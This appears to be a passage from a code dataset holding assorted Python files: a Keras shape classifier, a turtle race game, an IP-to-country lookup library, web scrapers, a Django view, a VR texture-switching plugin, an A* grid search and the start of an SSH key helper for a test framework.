a[0]\n plt.imshow(b)\n print(c[\"top_left\"][0])","sub_path":"vision/datasets/eigener_loader.py","file_name":"eigener_loader.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588215938","text":"import os\nimport matplotlib.image as img\nimport numpy\nfrom tensorflow import keras\nfrom scipy import misc\nfrom PIL import Image,ImageDraw\nimages = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Train\")\nresized_images = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\")\ntrain = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Test\")\nresized_train = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\")\nshapes = [\"triangle\",\"square\",\"pentagon\",\"hexagon\"]\nprocesssed_images = []\n\n\n\n\nfor i in images:\n ig = Image.open(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Train\\\\{i}\")\n ig = ig.resize((28,28))\n ig.save(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\\\\{i}\")\nfor i in resized_images:\n n = img.imread(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\\\\{i}\")\n processsed_images.append(n)\n\nTest_images = numpy.array(processsed_images)\n\ns = 0\nfor i in Test_images:\n for k in i:\n for x in k:\n noofshapes = len(x)\n for m in x:\n s += 1\n\ndiv = s\nTest_images = Test_images/255\n\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28, 3)),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(len(shapes))\n])\n\nlabel = []\nwith open(\"label.txt\",'r') as f:\n data = f.read()\n label = data.split(\",\")\n f.close()\n\nfor i in range(0,len(label)):\n label[i] = float(label[i])\n\nlabel = numpy.array(label)\n\nmodel.compile(optimizer='adam',\n loss= keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\ncheckpoint_path = \"training_1/cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\ncp_callback = keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\n#model.fit(Test_images, label, epochs=10,callbacks=cp_callback)\n\ntest_images = []\ntest_images_directory = []\n\nfor i in train:\n ig = Image.open(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Test\\\\{i}\")\n ig = ig.resize((28,28))\n ig.save(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\nfor i in resized_train:\n n = img.imread(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\n test_images_directory.append(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\n test_images.append(n)\n\n\ntest_images_array = numpy.array(test_images)\nprobability_model = keras.Sequential([model, keras.layers.Softmax()])\n\n\npredictions = probability_model.predict(test_images_array)\nprint(predictions)\n\nimport math\nfor i in range(0,len(predictions)):\n image = Image.open(test_images_directory[i])\n image = image.resize((500,500))\n for k in range(0,len(predictions[i])):\n if predictions[i][k]*100 > 25: \n v = str(shapes[k]) + \":\" + str(predictions[i][k]*100)\n\n try:\n x = round(math.sqrt(s))/noofshapes\n except:\n x = round(math.sqrt(s))\n noofshapes -= 1\n tx = ImageDraw.Draw(image)\n tx.text((x,x),v,fill=(0,0,0,0))\n \n image.save(\"a.png\")\n image.show()\n\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105844890","text":"from time import sleep\nfrom turtle import Screen, Turtle\n\ncolors = ['red', 'green', 'blue', 'brown', 'purple', 'black']\ncurrent_postion = -300\ncurrent_color = 0\n\ndef next_color():\n global current_color\n result = colors[current_color % len(colors)]\n current_color += 1\n return result\n\nclass RaceTurtle(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('turtle')\n self.setheading(90)\n self.race_speed = 1\n self.shapesize(2, 2, 1)\n self.speed('fastest')\n self.old_color = next_color()\n self.color(self.old_color)\n\n def set_speed(self, speed):\n self.race_speed = speed\n\n def celebrate(self):\n while True:\n self.color('yellow')\n sleep(1)\n self.color(self.old_color)\n sleep(1)\n\n\n def race_move(self):\n self.forward(self.race_speed / 10)\n if self.ycor() > 200:\n return False\n return True\n\n\nclass Race():\n def __init__(self):\n super().__init__()\n self.screen = Screen()\n self.screen.screensize(500, 500)\n self.turtles = []\n self.last_turtle_position = -300\n self.last_turtle_color = 0\n\n def new_turtle(self):\n t = RaceTurtle()\n t.penup()\n t.setx(self.last_turtle_position)\n self.last_turtle_position += 100\n t.sety(-200)\n\n t.speed('slow')\n self.turtles.append(t)\n\n return t\n\n def stop_race(self, winner):\n winner.celebrate()\n\n def run(self):\n while True:\n for t in self.turtles:\n if not t.race_move():\n self.stop_race(t)\n self.screen.mainloop()\n","sub_path":"lesson2/racelib.py","file_name":"racelib.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413954773","text":"#!/usr/bin/env python\nimport ipaddress\nimport os\nimport threading\nimport logging\ntry:\n from functools import lru_cache\nexcept ImportError:\n from backports.functools_lru_cache import lru_cache\n\nimport six\nfrom tinydb import TinyDB, Query\nfrom tinydb.middlewares import CachingMiddleware\n\nfrom iptocc.json_storage_read_only import JSONStorageReadOnly\n\n__author__ = \"Ronie Martinez\"\n__copyright__ = \"Copyright 2017, Ronie Martinez\"\n__credits__ = [\"Ronie Martinez\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.2\"\n__maintainer__ = \"Ronie Martinez\"\n__email__ = \"ronmarti18@gmail.com\"\n__status__ = \"Production\"\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ncaching_middleware = CachingMiddleware(JSONStorageReadOnly)\ndatabase = TinyDB(os.path.join(dir_path, 'rir_statistics_exchange.json'), storage=caching_middleware)\nquery = Query()\n\nlock = threading.Lock()\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=100000)\ndef ipv4_get_country_code(ip_address):\n with lock:\n for record in database.search(query.type == 'ipv4'):\n start_address = ipaddress.IPv4Address(record.get('start'))\n if start_address <= ip_address < start_address + record.get('value'):\n country_code = record.get('country_code')\n if six.PY2:\n country_code = str(country_code)\n logger.debug('Country code for ip=%s is %s.', ip_address, country_code)\n return country_code\n logger.debug('Cannot find country code for ip=%s', ip_address)\n return None\n\n\n@lru_cache(maxsize=100000)\ndef ipv6_get_country_code(ip_address):\n with lock:\n for record in database.search(query.type == 'ipv6'):\n network = ipaddress.IPv6Network('{}/{}'.format(record.get('start'), record.get('value')))\n if ip_address in network:\n country_code = record.get('country_code')\n if six.PY2:\n country_code = str(country_code)\n logger.debug('Country code for ip=%s is %s.', ip_address, country_code)\n return country_code\n logger.debug('Cannot find country code for ip=%s', ip_address)\n return None\n\n\ndef get_country_code(ip_address):\n # convert string to ipaddress.IPv4Address or ipaddress.IPv6Address\n if isinstance(ip_address, six.text_type):\n ip_address = ipaddress.ip_address(ip_address)\n if six.PY2 and isinstance(ip_address, six.string_types):\n ip_address = ipaddress.ip_address(unicode(ip_address))\n if isinstance(ip_address, ipaddress.IPv4Address):\n return ipv4_get_country_code(ip_address) # IPv4\n return ipv6_get_country_code(ip_address) # IPv6\n","sub_path":"iptocc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444203216","text":"import re\nfrom urllib.request import urlopen,Request\nimport sqlite3\n\nclass DataManager(object):\n def updata_new_data(self,oldData):\n # 去除换行\n name = oldData[0]\n name = name.strip('\\n')\n content = oldData[2]\n content = content.strip('\\n')\n # 去除
\n pattern = re.compile(r'
')\n content = pattern.sub('',content)\n newData = (name,oldData[1],content,oldData[3],oldData[4])\n\n return newData\n\nclass DBManager(object):\n connect = None\n coursor = None\n\n @classmethod\n def create_db_and_table(cls):\n cls.connect = sqlite3.connect(\"qbDB\")\n cls.coursor = cls.connect.cursor()\n cls.coursor.execute('create table if not exists qbTable (name text ,'\n 'age text , content text , like text ,comment text)')\n cls.connect.commit()\n\n @classmethod\n def insert_into_table(cls,receiveData):\n cls.coursor.execute('insert into qbTable (name,age,content,like,comment) VALUES (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(receiveData[0],receiveData[1],receiveData[2],receiveData[3],receiveData[4]))\n cls.connect.commit()\n\n @classmethod\n def close_db(cls):\n cls.coursor.close()\n cls.connect.close()\n\nclass QSBKSpider(object):\n def __init__(self):\n # 设置基本网址,基本网址为所有需要爬虫的网址的共同部分\n self.base_url = 'https://www.qiushibaike.com/hot/page/'\n # 设置爬虫的用户标识\n self.headers = {\n \"User-Agent\":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/56.0.3051.99'\n }\n # 创建一个数据管理的实例化对象\n # 并使其作为QSBKSpider的属性\n self.dataTool = DataManager()\n\n def get_code_from_url(self,index):\n # 拼接完整的url\n url = self.base_url + str(index) + '/'\n # 设置请求的url的请求头信息\n request = Request(url,headers = self.headers)\n # 获取响应信息\n response = urlopen(request)\n try:\n # 读取响应信息并解码\n code = response.read().decode()\n except Exception as e:\n print('获取信息失败',e)\n return None\n else:\n return code\n\n def get_userfull_info_from_code(self,code):\n pattern = re.compile(r'
.*?

(.*?)

.*?
(.*?)
.*?
.*?(.*?).*?.*?(.*?).*?.*?(.*?)',re.S)\n result = pattern.findall(code)\n\n for oldData in result:\n newData = self.dataTool.updata_new_data(oldData)\n DBManager.insert_into_table(newData)\n\nDBManager.create_db_and_table()\n\nqbSpider = QSBKSpider()\n# 获取网页源码并转码\ncode = qbSpider.get_code_from_url(1)\n\nfor x in range(1,6):\n code = qbSpider.get_code_from_url(x)\n # 提取网页数据\n qbSpider.get_userfull_info_from_code(code)\nDBManager.close_db()","sub_path":"python/复习专用/13号/糗事百科.py","file_name":"糗事百科.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"419404479","text":"# Create your views here.\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest, StreamingHttpResponse\nfrom django.core.urlresolvers import reverse\nimport json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_user_agents.utils import get_user_agent\n\n\ndef _getTemplate(action):\n return \"samiServicios/home/{0}.html\".format(action)\n\ndef index(request, *args, **kwargs):\n \n agent = get_user_agent(request)\n\n os = agent.os.family.lower() if agent.os.family else \"\"\n esTablet = agent.is_tablet\n\n osReal = \"\"\n \n if \"android\" in os:\n osReal = \"android\"\n\n elif \"ios\" in os:\n osReal = \"ios\"\n\n elif \"blackberry\" in os:\n osReal = \"bb\"\n\n elif \"windows phone\" in os:\n osReal = \"wp\"\n\n else:\n osReal = \"pc\"\n \n \n return render(request, _getTemplate('index'), {'osReal':osReal, 'esTablet':esTablet})\n\n\n","sub_path":"SAMI/samiServicios/controllers/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"175695278","text":"import gs\r\nimport os\r\nimport vr_controller\r\nimport json\r\n\r\nplus = gs.GetPlus()\r\n\r\n\r\npath_object_textures = \"\"\r\nswitch_object_textures = None\r\n\r\n\r\ndef load_params(save, scn, openvr_frame_renderer, gui):\r\n\tglobal path_object_textures, switch_object_textures\r\n\tif \"path_object_textures\" in save:\r\n\t\tpath_object_textures = save[\"path_object_textures\"]\r\n\t\tif os.path.exists(path_object_textures):\r\n\t\t\twith open(path_object_textures, 'r') as outfile:\r\n\t\t\t\tswitch_object_textures = json.load(outfile)\r\n\r\n\r\ndef save_params(save, scn, openvr_frame_renderer, gui):\r\n\tsave[\"path_object_textures\"] = path_object_textures\r\n\r\n\r\ndef post_load_scene(scn, openvr_frame_renderer, gui):\r\n\tif switch_object_textures is None or not len(switch_object_textures):\r\n\t\treturn\r\n\r\n\tfor name_object, data in switch_object_textures.items():\r\n\t\tnode = scn.GetNode(name_object)\r\n\t\tif node is not None:\r\n\t\t\tswitch_object_textures[name_object][\"node\"] = node\r\n\r\n\t\t\t# add the rigid body to raycast later\r\n\t\t\tif node.GetComponent(\"RigidBody\") is None:\r\n\t\t\t\tnode.AddComponent(gs.MakeRigidBody())\r\n\t\t\t\tmesh_col = gs.MakeMeshCollision()\r\n\t\t\t\tmesh_col.SetGeometry(gs.LoadCoreGeometry(node.GetObject().GetGeometry().GetName()))\r\n\t\t\t\tmesh_col.SetMass(0)\r\n\t\t\t\tnode.AddComponent(mesh_col)\r\n\t\t\t\tnode.SetIsStatic(True)\r\n\r\n\r\ndef update_gui(scn, openvr_frame_renderer, gui):\r\n\tglobal switch_object_textures, path_object_textures\r\n\tif gui.Button(\"Load switch object textures file\"):\r\n\t\tcurrent_filename = gs.OpenFileDialog(\"Load switch object textures file\", \"*.json\", \"\")[1]\r\n\t\tif current_filename != \"\":\r\n\t\t\twith open(current_filename, 'r') as outfile:\r\n\t\t\t\tswitch_object_textures = json.load(outfile)\r\n\t\t\t\tpath_object_textures = current_filename\r\n\r\n\t\t\t\tpost_load_scene(scn, openvr_frame_renderer, gui)\r\n\r\n\r\nbutton_pressed = False\r\nselected_material = None\r\nselected = {\"n\": None, \"m\": None}\r\n\r\n\r\ndef update(scn, openvr_frame_renderer):\r\n\tglobal button_pressed, selected_material\r\n\tif switch_object_textures is None or len(switch_object_textures) <= 0:\r\n\t\treturn\r\n\r\n\tif selected_material is None: # load the selected material\r\n\t\tselected_material = plus.LoadMaterial(\"assets/selected.mat\")\r\n\r\n\tcontroller0 = gs.GetInputSystem().GetDevice(\"openvr_controller_0\")\r\n\r\n\t# restore material\r\n\tif selected[\"n\"] is not None:\r\n\t\tgeo = selected[\"n\"].GetObject().GetGeometry()\r\n\t\tfor m in range(geo.GetMaterialCount()):\r\n\t\t\tgeo.SetMaterial(m, selected[\"m\"][m])\r\n\t\tselected[\"n\"] = None\r\n\t\tselected[\"m\"] = None\r\n\r\n\tpos_laser = None\r\n\tdir_laser = None\r\n\tclick_on_switch = False\r\n\r\n\tif openvr_frame_renderer is not None and controller0 is not None:\r\n\t\tif controller0.GetValue(gs.InputDevice.InputButton2) > 0.2:\r\n\t\t\tmat_controller = controller0.GetMatrix(gs.InputDevice.MatrixHead)\r\n\r\n\t\t\tpos_cam = scn.GetCurrentCamera().GetTransform().GetPosition()\r\n\t\t\tpos_laser = mat_controller.GetTranslation() + pos_cam\r\n\t\t\tdir_laser = mat_controller.GetZ()\r\n\r\n\t\t\tif controller0.GetValue(gs.InputDevice.InputButton2) == 1.0:\r\n\t\t\t\tclick_on_switch = True\r\n\telse:\r\n\t\tif plus.KeyDown(gs.InputDevice.KeySpace) or plus.KeyDown(gs.InputDevice.KeyW):\r\n\t\t\tpos_laser = scn.GetCurrentCamera().GetTransform().GetPosition()\r\n\t\t\tdir_laser = scn.GetCurrentCamera().GetTransform().GetWorld().GetZ()\r\n\r\n\t\tif plus.KeyDown(gs.InputDevice.KeyW):\r\n\t\t\tclick_on_switch = True\r\n\r\n\tif pos_laser is not None:\r\n\t\thit, trace = scn.GetPhysicSystem().Raycast(pos_laser, dir_laser, 1)\r\n\t\tif hit:\r\n\t\t\t# helper_2d.draw_line(scene_simple_graphic, pos_laser, trace.GetPosition(),\r\n\t\t\t# gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\t\t\t# if not use_vr:\r\n\t\t\t# \thelper_2d.draw_cross(scene_simple_graphic, trace.GetPosition(),\r\n\t\t\t# \t gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\r\n\t\t\tname = trace.GetNode().GetName()\r\n\t\t\tif name in switch_object_textures:\r\n\t\t\t\tselected_node = switch_object_textures[name][\"node\"]\r\n\r\n\t\t\t\t# if need to switch to selected material\r\n\t\t\t\tcurrent_material = selected_node.GetObject().GetGeometry().GetMaterial(0)\r\n\t\t\t\tif current_material != selected_material:\r\n\t\t\t\t\tselected[\"n\"] = selected_node\r\n\t\t\t\t\tselected[\"m\"] = []\r\n\t\t\t\t\tgeo = selected_node.GetObject().GetGeometry()\r\n\t\t\t\t\tfor m in range(geo.GetMaterialCount()):\r\n\t\t\t\t\t\tselected[\"m\"].append(geo.GetMaterial(m))\r\n\t\t\t\t\t\tgeo.SetMaterial(m, selected_material)\r\n\t\t\t\t\t\tselected_material.SetTexture(\"diffuse_map\", current_material.GetTexture(\"diffuse_map\"))\r\n\r\n\t\t\t\t# switch if the trigger is triggered\r\n\t\t\t\tif click_on_switch and not button_pressed:\r\n\t\t\t\t\tif len(selected[\"m\"]) > 0:\r\n\t\t\t\t\t\tnew_diffuse_tex = plus.GetRendererAsync().LoadTexture(switch_object_textures[name][\"diffuse_map\"][switch_object_textures[name][\"index\"]])\r\n\t\t\t\t\t\tswitch_object_textures[name][\"index\"] += 1\r\n\t\t\t\t\t\tif switch_object_textures[name][\"index\"] >= len(switch_object_textures[name][\"diffuse_map\"]):\r\n\t\t\t\t\t\t\tswitch_object_textures[name][\"index\"] = 0\r\n\r\n\t\t\t\t\t\tselected_material.SetTexture(\"diffuse_map\", new_diffuse_tex)\r\n\t\t\t\t\t\tselected[\"m\"][0].SetTexture(\"diffuse_map\", new_diffuse_tex)\r\n\r\n\r\n\r\n\t\t\t\t\t# else:\r\n\t\t# \thelper_2d.draw_line(scene_simple_graphic, pos_laser, pos_laser + dir_laser * 10,\r\n\t\t# \t gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\t\t# \tif not use_vr:\r\n\t\t# \t\thelper_2d.draw_cross(scene_simple_graphic, pos_laser + dir_laser * 0.2,\r\n\t\t# \t\t gs.Color(238 / 255, 235 / 255, 92 / 255), 0.01)\r\n\r\n\tif click_on_switch:\r\n\t\tif not button_pressed:\r\n\t\t\tbutton_pressed = True\r\n\telse:\r\n\t\tbutton_pressed = False","sub_path":"maneki-neko/build_viewer/plugins/switch_textures/switch_textures.py","file_name":"switch_textures.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"315732099","text":"from urllib.request import urlopen\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ndef injury_update():\n feed_url = 'https://www.cbssports.com/nba/injuries/daily'\n\n html = urlopen(feed_url)\n soup = BeautifulSoup(html, 'lxml')\n\n table = soup.find('table', {'class':'data'})\n #print(table.prettify())\n\n injury_df = pd.read_html(table.prettify())[0][1:]\n columns = injury_df.iloc[0]\n injury_df = injury_df[1:]\n injury_df.columns = columns\n #print(injury_df)\n\n injury_df.to_csv('injury_updates.csv', index=False)\n\nif __name__ == \"__main__\":\n injury_update()\n\n","sub_path":"injury_updates.py","file_name":"injury_updates.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"644035074","text":"from typing import Any, List, Tuple\n\nOUTPUT_ERROR = -1\nOUTPUT_KATAGO_STDERR = -0.5\nOUTPUT_INFO = 0\nOUTPUT_DEBUG = 1\nOUTPUT_EXTRA_DEBUG = 2\n\n\ndef var_to_grid(array_var: List[Any], size: Tuple[int, int]) -> List[List[Any]]:\n \"\"\"convert ownership/policy to grid format such that grid[y][x] is for move with coords x,y\"\"\"\n ix = 0\n grid = [[]] * size[1]\n for y in range(size[1] - 1, -1, -1):\n grid[y] = array_var[ix : ix + size[0]]\n ix += size[0]\n return grid\n\n\ndef evaluation_class(points_lost: float, eval_thresholds: List[float]):\n i = 0\n while i < len(eval_thresholds) - 1 and points_lost < eval_thresholds[i]:\n i += 1\n return i\n","sub_path":"core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523922097","text":"from heapq import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom .LineSegment2d import LineSegment2d\nfrom .Node2d import Node2d\nfrom .Vec2d import Vec2d\n\nclass GridSearch:\n def __init__(self, node_radius, xy_res):\n self.node_radius = node_radius\n self.xy_res = xy_res\n self.XYBounds = []\n self.obstacles_segments = []\n self.max_grid_x = 0\n self.max_grid_y = 0\n \n def euclidDistance(self, x1, y1, x2, y2):\n return ((x1-x2)**2 + (y1-y2)**2)**(1/2)\n \n def checkConstraints(self, next_node, curr_node):\n if next_node.grid_x < 0 or next_node.grid_x > self.max_grid_x or \\\n next_node.grid_y < 0 or next_node.grid_y > self.max_grid_y:\n return False\n \n if len(self.obstacles_segments) == 0:\n return True\n \n for obstacle in self.obstacles_segments:\n for obstacle_seg in obstacle:\n if obstacle_seg.distanceToPoint(Vec2d(next_node.x, next_node.y)) < self.node_radius:\n return False\n if LineSegment2d(Vec2d(curr_node.x, curr_node.y), Vec2d(next_node.x, next_node.y)).isIntersect(obstacle_seg):\n return False\n return True\n \n def generateNextNodes(self, curr_node):\n path_cost = curr_node.path_cost\n x = curr_node.x\n y = curr_node.y\n diag_dist = 2**(1/2)\n \n next_nodes = []\n up = Node2d(x, y + self.xy_res, self.xy_res, self.XYBounds)\n up.setPathCost(path_cost + 1)\n next_nodes.append(up)\n \n up_right = Node2d(x + self.xy_res, y + self.xy_res, self.xy_res, self.XYBounds)\n up_right.setPathCost(path_cost + diag_dist)\n next_nodes.append(up_right)\n \n right = Node2d(x + self.xy_res, y, self.xy_res, self.XYBounds)\n right.setPathCost(path_cost + 1)\n next_nodes.append(right)\n \n down_right = Node2d(x + self.xy_res, y - self.xy_res, self.xy_res, self.XYBounds)\n down_right.setPathCost(path_cost + diag_dist)\n next_nodes.append(down_right)\n \n down = Node2d(x, y - self.xy_res, self.xy_res, self.XYBounds)\n down.setPathCost(path_cost + 1)\n next_nodes.append(down)\n \n down_left = Node2d(x - self.xy_res, y - self.xy_res, self.xy_res, self.XYBounds)\n down_left.setPathCost(path_cost + diag_dist)\n next_nodes.append(down_left)\n \n left = Node2d(x - self.xy_res, y, self.xy_res, self.XYBounds)\n left.setPathCost(path_cost + 1)\n next_nodes.append(left)\n \n up_left = Node2d(x - self.xy_res, y + self.xy_res, self.xy_res, self.XYBounds)\n up_left.setPathCost(path_cost + diag_dist)\n next_nodes.append(up_left)\n \n return next_nodes\n \n def generateAStartPath(self, s_x, s_y, e_x, e_y, XYBounds, obstacles_vertices):\n self.obstacles_segments = self.getObstaclesSegments(obstacles_vertices)\n self.XYBounds = XYBounds\n self.max_grid_x = (XYBounds[1] - XYBounds[0]) // self.xy_res\n self.max_grid_y = (XYBounds[3] - XYBounds[2]) // self.xy_res\n \n start_node = Node2d(s_x, s_y, self.xy_res, XYBounds)\n end_node = Node2d(e_x, e_y, self.xy_res, XYBounds)\n final_node = None\n \n open_set = {}\n close_set = {}\n open_pq = []\n \n open_set[start_node.index] = start_node\n heappush(open_pq, (start_node.getCost(), start_node.index))\n \n explored_num = 0\n while len(open_pq) != 0:\n curr_node = open_set[heappop(open_pq)[1]]\n if curr_node == end_node:\n final_node = curr_node\n break\n \n close_set[curr_node.index] = curr_node\n next_nodes = self.generateNextNodes(curr_node)\n for next_node in next_nodes:\n if (not self.checkConstraints(next_node, curr_node)):\n continue\n if close_set.get(next_node.index) is not None:\n continue\n if open_set.get(next_node.index) is None:\n explored_num += 1\n next_node.setHeuCost(self.euclidDistance(next_node.grid_x, next_node.grid_y,\n end_node.grid_x, end_node.grid_y))\n next_node.pre_node = curr_node\n open_set[next_node.index] = next_node\n heappush(open_pq, (next_node.getCost(), next_node.index))\n \n if final_node is None:\n return None\n else:\n curr_node = final_node\n path_points = []\n while curr_node is not None: \n path_points.append(Vec2d(curr_node.x, curr_node.y))\n curr_node = curr_node.pre_node \n \n return path_points[::-1]\n \n def plot_path(self, figsize, path_points, optimized_trajectory=None):\n plt.figure(figsize=figsize)\n plt.xlim(self.XYBounds[0], self.XYBounds[1])\n plt.ylim(self.XYBounds[2], self.XYBounds[3])\n plt.xticks(np.arange(self.XYBounds[0], self.XYBounds[1], self.xy_res))\n plt.yticks(np.arange(self.XYBounds[2], self.XYBounds[3], self.xy_res))\n x_vec = list(map(lambda vec: vec.x, path_points))\n y_vec = list(map(lambda vec: vec.y, path_points))\n plt.plot(x_vec, y_vec)\n if optimized_trajectory:\n x_vec = list(map(lambda vec: vec.x, optimized_trajectory))\n y_vec = list(map(lambda vec: vec.y, optimized_trajectory))\n plt.scatter(x_vec, y_vec, alpha=0.7, c='black')\n for obstacle in self.obstacles_segments:\n for obstacle_seg in obstacle:\n plt.plot([obstacle_seg.start.x, obstacle_seg.end.x],\n [obstacle_seg.start.y, obstacle_seg.end.y], c='r')\n plt.grid()\n plt.show()\n \n @staticmethod\n def getObstaclesSegments(obstaclesVerticesVectors):\n obstacles = []\n for verticesVector in obstaclesVerticesVectors:\n obstacle_segments = []\n n = len(verticesVector)\n for i in range(n):\n if i < n-1:\n obstacle_segments.append(LineSegment2d(verticesVector[i], verticesVector[i+1]))\n elif n > 2:\n obstacle_segments.append(LineSegment2d(verticesVector[i], verticesVector[0]))\n obstacles.append(obstacle_segments)\n return obstacles","sub_path":"Optimizer/utils/GridSearch.py","file_name":"GridSearch.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"216540540","text":"import turtle\nfrom PIL import Image\nimport io,os\nfrom numpy import random\nimport gc\nimport numpy as np\nimport pdb\nimport cv2\n\nmask_info = []\nsize = 128\n\ndef save_bounding_box_info():\n\tbb_info = np.array(mask_info)\n\tnp.save('bb_info' , bb_info)\n\n\nclass dot(object):\n\tdef __init__(self):\n\t\tself.cv = turtle.Canvas(width=128, height=128)\n\t\tself.width = 128\n\t\tself.height = 128\n\t\t# this will tell us where is the dot located in the image\n\n\tdef save(self,file,path):\n\t\tself.cv.pack()\n\t\tself.cv.update()\n\t\tps = self.cv.postscript(colormode='gray')\n\t\timg = Image.open(io.BytesIO(ps.encode('utf-8')))\n\t\timg = np.array(img)\n\t\timg = cv2.resize(img , (128,128))\n\t\tos.makedirs('./dot_without_bg/' + path + '/' , exist_ok=True)\n\t\tcv2.imwrite('./dot_without_bg/' + path + '/' + str(file) +'.bmp' , img)\n\t\tself.cv.destroy()\n\n\tdef createDot(self):\n\t\t\n\t\t# place main body\n\t\tradius = 10\n\t\tcx = random.randint(radius,self.width-radius)\n\t\tcy = random.randint(radius,self.height-radius)\n\t\tx0 = cx - radius \n\t\ty0 = cy - radius \n\t\tx1 = cx + radius \n\t\ty1 = cy + radius \t\t\n\t\tself.cv.create_oval( x0 , y0 , x1 , y1 ,fill='Black' )\t\t\n\t\tmask_info.append(np.array([x0, y0 , x1 , y1]))\n\t\n\nfor i in range(1000):\n\tprint(i)\n\tobj = dot()\n\tobj.createDot()\n\tif i < 700:\n\t\tobj.save(i , 'train')\n\telse:\n\t\tobj.save(i , 'test')\n\nsave_bounding_box_info()","sub_path":"data/dot_without_bg.py","file_name":"dot_without_bg.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"264642490","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport os\r\nimport csv\r\n\r\npage = requests.get('https://www.whitehouse.gov/briefings-statements/')\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nbriefings = soup.find_all(class_='briefing-statement briefing-statement--results')\r\n\r\nif os.path.exists('whitehouse.csv'):\r\n os.remove('whitehouse.csv')\r\n\r\nf = open(\"whitehouse.csv\", 'a', newline='')\r\n\r\nfor item in briefings:\r\n title_div = item.find(class_='briefing-statement__title')\r\n link_tag = title_div.find('a')\r\n link = link_tag.attrs['href']\r\n title = link_tag.text\r\n time_tag = item.find(class_='meta__date')\r\n time = time_tag.text\r\n print(time)\r\n print(title)\r\n print(link)\r\n print('')\r\n\r\n tup = (time, title, link)\r\n writer = csv.writer(f)\r\n writer.writerow(tup)\r\n\r\nf.close()","sub_path":"whitehouse.py","file_name":"whitehouse.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481033428","text":"#!/usr/bin/python\nimport contextlib\nimport errno\nimport logging\nimport os\nimport paramiko\nimport re\n\nfrom cStringIO import StringIO\nfrom teuthology import contextutil\nfrom ..orchestra import run\nfrom ..orchestra.connection import create_key\n\nlog = logging.getLogger(__name__)\n\n# generatees a public and private key\ndef generate_keys():\n key = paramiko.RSAKey.generate(2048)\n privateString = StringIO()\n key.write_private_key(privateString)\n return key.get_base64(), privateString.getvalue()\n\n# deletes the keys and removes ~/.ssh/authorized_keys entries we added\ndef 